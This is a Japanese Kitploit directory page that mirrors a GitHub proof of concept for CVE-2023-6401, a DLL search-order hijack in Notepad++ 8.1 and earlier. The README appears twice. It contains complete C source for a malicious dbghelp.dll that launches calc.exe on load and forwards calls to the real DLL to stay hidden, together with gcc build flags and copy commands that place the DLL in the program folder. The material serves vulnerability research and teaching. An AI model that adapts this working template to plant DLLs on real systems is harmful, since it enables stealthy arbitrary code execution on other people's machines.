Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-6401 — CVE-2023-6401は、悪意のある`dbghelp.dll`ファイルをアプリケーションディレクトリに配置することで、攻撃者が任意のコードを実行できるようにするDLLハイジャックの脆弱性です。このプロジェクトは脆弱性を実証し、再現可能なPoCを提供します。 | Kitploit
ツール/GitHubGitHub/mekitoci/cve-2023-6401
脆弱性分析エクスプロイト学習と教育ペイロード開発バイナリエクスプロイト
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401は、悪意のある`dbghelp.dll`ファイルをアプリケーションディレクトリに配置することで、攻撃者が任意のコードを実行できるようにするDLLハイジャックの脆弱性です。このプロジェクトは脆弱性を実証し、再現可能なPoCを提供します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6401 · DLLハイジャック概念実証

License Platform

英語 | 中国語


中国語

⚠️ 重要な声明:セキュリティ研究および教育目的のみに使用してください

NotePad++ ≤ 8.1 DLLハイジャック脆弱性の概念実証。アプリケーションディレクトリに悪意のある dbghelp.dll を配置することで任意のコードを実行します。

クイックスタート

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

期待される結果: 電卓が起動 + メッセージボックス表示 + NotePad++が正常に起動

PoC result

脆弱性の詳細

原理

Windowsは以下の順序でDLLをロードします:

  1. アプリケーションディレクトリ(最高優先度)
  2. System32ディレクトリ
  3. Windowsディレクトリ
  4. 現在のディレクトリ
  5. PATH環境変数

NotePad++起動時に dbghelp.dll がロードされます。アプリケーションディレクトリに同じ名前の悪意のあるDLLを配置することで、システムDLLがロードされる前にコードを実行できます。

技術実装

コアコード

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

主な特徴

  • 検索順序ハイジャック:Windows DLL検索メカニズムを悪用
  • API転送:本物のDLLをロードし、関数呼び出しを転送してアプリケーションの正常な動作を維持
  • 隠蔽性:ユーザーは異常に気づかない

コンパイルオプション

MinGW (推奨)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

クリーンアップ

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

参考資料

  • CVE-2023-6401
  • Microsoft DLL検索順序
  • MITRE ATT&CK T1574.001

免責事項

このプロジェクトは教育およびセキュリティ研究目的のみに使用されます。ユーザーは適用される法律および規制を遵守する責任を負います。


英語

⚠️ 重要なお知らせ:セキュリティ研究および教育目的のみに使用してください

NotePad++ ≤ 8.1 DLLハイジャック脆弱性の概念実証。アプリケーションディレクトリに悪意のある dbghelp.dll を配置することで任意のコードを実行します。

クイックスタート

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

期待される結果: 電卓が起動 + メッセージボックス表示 + NotePad++が正常に起動

PoC result

脆弱性の詳細

メカニズム

Windowsは以下の順序でDLLをロードします:

  1. アプリケーションディレクトリ(最高優先度)
  2. System32ディレクトリ
  3. Windowsディレクトリ
  4. 現在のディレクトリ
  5. PATH環境変数

NotePad++は起動時に dbghelp.dll をロードします。アプリケーションディレクトリに同じ名前の悪意のあるDLLを配置することで、システムDLLがロードされる前にコードを実行できます。

技術実装

コアコード

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

主な特徴

  • 検索順序ハイジャック:Windows DLL検索メカニズムを悪用
  • API転送:本物のDLLをロードし、関数呼び出しを転送してアプリケーションの正常な動作を維持
  • 隠蔽性:ユーザーは異常に気づかない

コンパイルオプション

MinGW (推奨)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

クリーンアップ

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

参考資料

  • CVE-2023-6401
  • Microsoft DLL検索順序
  • MITRE ATT&CK T1574.001

免責事項

このプロジェクトは教育およびセキュリティ研究目的のみに使用されます。ユーザーは適用される法律および規制を遵守する責任を負います。

ツールをダウンロード
項目詳細
CVE番号CVE-2023-6401
影響バージョンNotePad++ ≤ 8.1
脆弱性タイプDLLハイジャック / 検索パスハイジャック
影響任意のコード実行
前提条件アプリケーションディレクトリへの書き込み権限
項目詳細
CVE番号CVE-2023-6401
影響バージョンNotePad++ ≤ 8.1
脆弱性タイプDLLハイジャック / 検索順序ハイジャック
影響任意のコード実行
前提条件アプリケーションディレクトリへの書き込み権限